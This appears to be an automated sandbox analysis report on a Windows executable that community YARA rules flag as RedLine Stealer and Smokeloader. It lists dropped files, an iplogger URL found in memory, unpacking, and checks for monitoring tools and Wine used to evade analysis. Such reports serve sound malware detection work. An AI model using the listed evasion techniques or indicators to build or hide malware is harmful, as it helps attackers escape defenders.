Source: 7JKssbjRDa.exe, 00000000.00000003.2942345955.000000000585D000.00000004.00000020.00020000.00000000.sdmp, 7JKssbjRDa.exe, 00000000.00000003.2943755516.00000000059A2000.00000004.00000020.00020000.00000000.sdmp, 7JKssbjRDa.exe, 00000000.00000003.2944183260.000000000595F000.00000004.00000020.00020000.00000000.sdmp, 7JKssbjRDa.exe, 00000000.00000003.2944399223.00000000059B8000.00000004.00000020.00020000.00000000.sdmp, 7JKssbjRDa.exe, 00000000.00000003.2942345955.000000000595B000.00000004.00000020.00020000.00000000.sdmp, 7JKssbjRDa.exe, 00000000.00000003.2942066363.0000000005647000.00000004.00000020.00020000.00000000.sdmp, 7JKssbjRDa.exe, 00000000.00000003.2943967641.0000000005B61000.00000004.00000020.00020000.00000000.sdmp, 7JKssbjRDa.exe, 00000000.00000003.2942621168.000000000595F000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.dr	String found in binary or memory: https://iplogger.org/1Pz8p7

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.3029432570.0000000000F4A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.3032420897.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

PE file contains section with special chars

Source: 7JKssbjRDa.exe	Static PE information: section name:
Source: 7JKssbjRDa.exe	Static PE information: section name: .idata
Source: 7JKssbjRDa.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\7JKssbjRDa.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_3_04D07CAA		0_3_04D07CAA
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_3_04CF9D60		0_3_04CF9D60
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_3_04CFC7DD		0_3_04CFC7DD
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_3_04D097F2		0_3_04D097F2
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_3_04D037F9		0_3_04D037F9
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_3_04CFE720		0_3_04CFE720
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_3_04D030E6		0_3_04D030E6
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_3_04CF2070		0_3_04CF2070
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_3_04D09912		0_3_04D09912
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_3_04CFCA0F		0_3_04CFCA0F
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_00402C70		0_2_00402C70
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_004188AA		0_2_004188AA
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_0040A960		0_2_0040A960
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_0040F320		0_2_0040F320
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_0040D3DD		0_2_0040D3DD
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_0041A3F2		0_2_0041A3F2
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_004143F9		0_2_004143F9
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_00413CE6		0_2_00413CE6
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_0041A512		0_2_0041A512
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_0040D60F		0_2_0040D60F
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_1000E184		0_2_1000E184
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_100102A0		0_2_100102A0
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_00AAD133		0_2_00AAD133
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_00AAD148		0_2_00AAD148
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_00982A98		0_2_00982A98
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_0090E8BC		0_2_0090E8BC
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_0093F6AA		0_2_0093F6AA
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_00990031		0_2_00990031
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_0098B029		0_2_0098B029
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_00985E50		0_2_00985E50
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_0083185A		0_2_0083185A
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_0087D65A		0_2_0087D65A
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_0098E59D		0_2_0098E59D
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_0097F9BA		0_2_0097F9BA
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_008739F2		0_2_008739F2
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_0084D30A		0_2_0084D30A
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_00980F04		0_2_00980F04
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_00987939		0_2_00987939
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_00858528		0_2_00858528
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_0097BF2C		0_2_0097BF2C
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_00985123		0_2_00985123
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_0097D94E		0_2_0097D94E
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_04B4F587		0_2_04B4F587
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_04B5A659		0_2_04B5A659
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_04B4D644		0_2_04B4D644
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_04B5A779		0_2_04B5A779
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_04B53F4D		0_2_04B53F4D
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_04B4D876		0_2_04B4D876
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_04B4ABC7		0_2_04B4ABC7
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_04B43B27		0_2_04B43B27

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\dll[1] F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF

Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: String function: 04CF8FA0 appears 35 times
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: String function: 04B49E07 appears 35 times
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: String function: 10003160 appears 34 times
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: String function: 00409BA0 appears 35 times

Source: C:\Users\user\Desktop\7JKssbjRDa.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6260 -s 488

Source: 7JKssbjRDa.exe, 00000000.00000003.2964582315.0000000005821000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBunifu_UI_v1.5.3.dll4 vs 7JKssbjRDa.exe
Source: 7JKssbjRDa.exe, 00000000.00000003.2963985929.00000000063B0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameY-Cleaner.exe4 vs 7JKssbjRDa.exe

Source: 7JKssbjRDa.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000000.00000002.3029432570.0000000000F4A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.3032420897.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: Y-Cleaner.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: soft[1].0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 7JKssbjRDa.exe

Static PE information: Section: phahcjgr ZLIB complexity 0.990221418012691

Source: classification engine

Classification label: mal100.evad.winEXE@2/15@0/1

Source: C:\Users\user\Desktop\7JKssbjRDa.exe

Code function: 0_2_00402950 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,

Source: C:\Users\user\Desktop\7JKssbjRDa.exe

Code function: 0_2_00F4B1D6 CreateToolhelp32Snapshot,Module32First,

Source: C:\Users\user\Desktop\7JKssbjRDa.exe

Code function: 0_2_00401880 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,

Source: C:\Users\user\Desktop\7JKssbjRDa.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\add[1].htm

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6260

Source: C:\Users\user\Desktop\7JKssbjRDa.exe

File created: C:\Users\user\AppData\Local\Temp\7WudVZeKwZEdsuzzf2sS

Jump to behavior

Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Command line argument: emp		0_2_00408020
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Command line argument: mixtwo		0_2_00408020

Source: C:\Users\user\Desktop\7JKssbjRDa.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\7JKssbjRDa.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 7JKssbjRDa.exe	Virustotal: Detection: 47%
Source: 7JKssbjRDa.exe	ReversingLabs: Detection: 55%

Source: 7JKssbjRDa.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: unknown	Process created: C:\Users\user\Desktop\7JKssbjRDa.exe "C:\Users\user\Desktop\7JKssbjRDa.exe"
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6260 -s 488

Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Section loaded: apphelp.dll			Jump to behavior
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Section loaded: winmm.dll			Jump to behavior
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Section loaded: msimg32.dll			Jump to behavior
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Section loaded: wininet.dll			Jump to behavior
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Section loaded: msvcr100.dll			Jump to behavior
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Section loaded: iertutil.dll			Jump to behavior
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Section loaded: winhttp.dll			Jump to behavior
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Section loaded: mswsock.dll			Jump to behavior
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Section loaded: iphlpapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Section loaded: winnsi.dll			Jump to behavior
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Section loaded: urlmon.dll			Jump to behavior
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Section loaded: srvcli.dll			Jump to behavior
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Section loaded: netutils.dll			Jump to behavior
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Section loaded: rsaenh.dll			Jump to behavior
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Section loaded: propsys.dll			Jump to behavior
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Section loaded: linkinfo.dll			Jump to behavior
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Section loaded: ntshrui.dll			Jump to behavior
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Section loaded: cscapi.dll			Jump to behavior

Source: C:\Users\user\Desktop\7JKssbjRDa.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: Cleaner.lnk.0.dr

LNK file: ..\AppData\Local\Temp\7WudVZeKwZEdsuzzf2sS\Y-Cleaner.exe

Source: 7JKssbjRDa.exe

Static file information: File size 1969664 > 1048576

Source: C:\Users\user\Desktop\7JKssbjRDa.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: 7JKssbjRDa.exe

Static PE information: Raw size of phahcjgr is bigger than: 0x100000 < 0x1b1600

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\7JKssbjRDa.exe

Unpacked PE file: 0.2.7JKssbjRDa.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;phahcjgr:EW;gfxrfigu:EW;.taggant:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;

Source: Y-Cleaner.exe.0.dr

Static PE information: 0xA0CED55F [Tue Jun 29 19:19:59 2055 UTC]

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: 7JKssbjRDa.exe	Static PE information: real checksum: 0x1e14af should be: 0x1ed7a7
Source: dll[1].0.dr	Static PE information: real checksum: 0x0 should be: 0x400e1
Source: Bunifu_UI_v1.5.3.dll.0.dr	Static PE information: real checksum: 0x0 should be: 0x400e1
Source: soft[1].0.dr	Static PE information: real checksum: 0x0 should be: 0x170243
Source: Y-Cleaner.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x170243

Source: 7JKssbjRDa.exe	Static PE information: section name:
Source: 7JKssbjRDa.exe	Static PE information: section name: .idata
Source: 7JKssbjRDa.exe	Static PE information: section name:
Source: 7JKssbjRDa.exe	Static PE information: section name: phahcjgr
Source: 7JKssbjRDa.exe	Static PE information: section name: gfxrfigu
Source: 7JKssbjRDa.exe	Static PE information: section name: .taggant

Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_3_04D0E2B5 push esi; ret		0_3_04D0E2BE
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_3_04D12B88 push ss; ret		0_3_04D12B89
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_0041FAB5 push esi; ret		0_2_0041FABE
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_00424388 push ss; ret		0_2_00424389
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_1000E891 push ecx; ret		0_2_1000E8A4
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_00AACCAD push 532A600Ch; mov dword ptr [esp], eax		0_2_00AACE71
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_00AACCAD push edx; mov dword ptr [esp], 7FFFCFC7h		0_2_00AACEE1
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_00AA8C8D push edx; ret		0_2_00AA8C8C
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_00AA948D push ebp; ret		0_2_00AA949C
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_00AAACEC push edx; mov dword ptr [esp], 7FBB4029h		0_2_00AAAD29
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_00AAACEC push edx; mov dword ptr [esp], esi		0_2_00AAAD53
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_00AAACEC push edx; mov dword ptr [esp], 37F3B9D2h		0_2_00AAAD93
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_00AAACEC push ebp; mov dword ptr [esp], 197FC949h		0_2_00AAADBE
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_00AAACEC push edi; mov dword ptr [esp], edx		0_2_00AAAE2E
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_00AA8CFE push eax; ret		0_2_00AA8D0D
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_00AA90C9 push ecx; ret		0_2_00AA90D8
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_00AA90DB push eax; ret		0_2_00AA9111
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_00AAACDB push edx; mov dword ptr [esp], 7FBB4029h		0_2_00AAAD29
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_00AAACDB push edx; mov dword ptr [esp], esi		0_2_00AAAD53
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_00AAACDB push edx; mov dword ptr [esp], 37F3B9D2h		0_2_00AAAD93
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_00AAACDB push ebp; mov dword ptr [esp], 197FC949h		0_2_00AAADBE
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_00AAACDB push edi; mov dword ptr [esp], edx		0_2_00AAAE2E
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_00AA8CD5 push ebp; ret		0_2_00AA8CE4
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_00AAB02E push ebx; mov dword ptr [esp], esi		0_2_00AAB067
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_00AAB02E push eax; mov dword ptr [esp], edx		0_2_00AAB0EB
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_00AAB02E push 13EC163Eh; mov dword ptr [esp], edx		0_2_00AAB189
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_00AAB00A push ebx; mov dword ptr [esp], esi		0_2_00AAB067
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_00AAB00A push eax; mov dword ptr [esp], edx		0_2_00AAB0EB
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_00AAB00A push 13EC163Eh; mov dword ptr [esp], edx		0_2_00AAB189
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_00AAB015 push ebx; mov dword ptr [esp], esi		0_2_00AAB067
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Code function: 0_2_00AAB015 push eax; mov dword ptr [esp], edx		0_2_00AAB0EB

Source: 7JKssbjRDa.exe	Static PE information: section name: phahcjgr entropy: 7.948616359297866
Source: Y-Cleaner.exe.0.dr	Static PE information: section name: .text entropy: 7.918511524700298
Source: soft[1].0.dr	Static PE information: section name: .text entropy: 7.918511524700298

Source: C:\Users\user\Desktop\7JKssbjRDa.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\soft[1]			Jump to dropped file
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	File created: C:\Users\user\AppData\Local\Temp\7WudVZeKwZEdsuzzf2sS\Bunifu_UI_v1.5.3.dll			Jump to dropped file
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\dll[1]			Jump to dropped file
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	File created: C:\Users\user\AppData\Local\Temp\7WudVZeKwZEdsuzzf2sS\Y-Cleaner.exe			Jump to dropped file

Source: C:\Users\user\Desktop\7JKssbjRDa.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\dll[1]			Jump to dropped file
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\soft[1]			Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Window searched: window name: FilemonClass			Jump to behavior
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Window searched: window name: PROCMON_WINDOW_CLASS			Jump to behavior
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Window searched: window name: RegmonClass			Jump to behavior
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Window searched: window name: FilemonClass			Jump to behavior
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Window searched: window name: PROCMON_WINDOW_CLASS			Jump to behavior
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Window searched: window name: Regmonclass			Jump to behavior
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Window searched: window name: Filemonclass			Jump to behavior
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Window searched: window name: PROCMON_WINDOW_CLASS			Jump to behavior
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	Window searched: window name: Regmonclass			Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\7JKssbjRDa.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
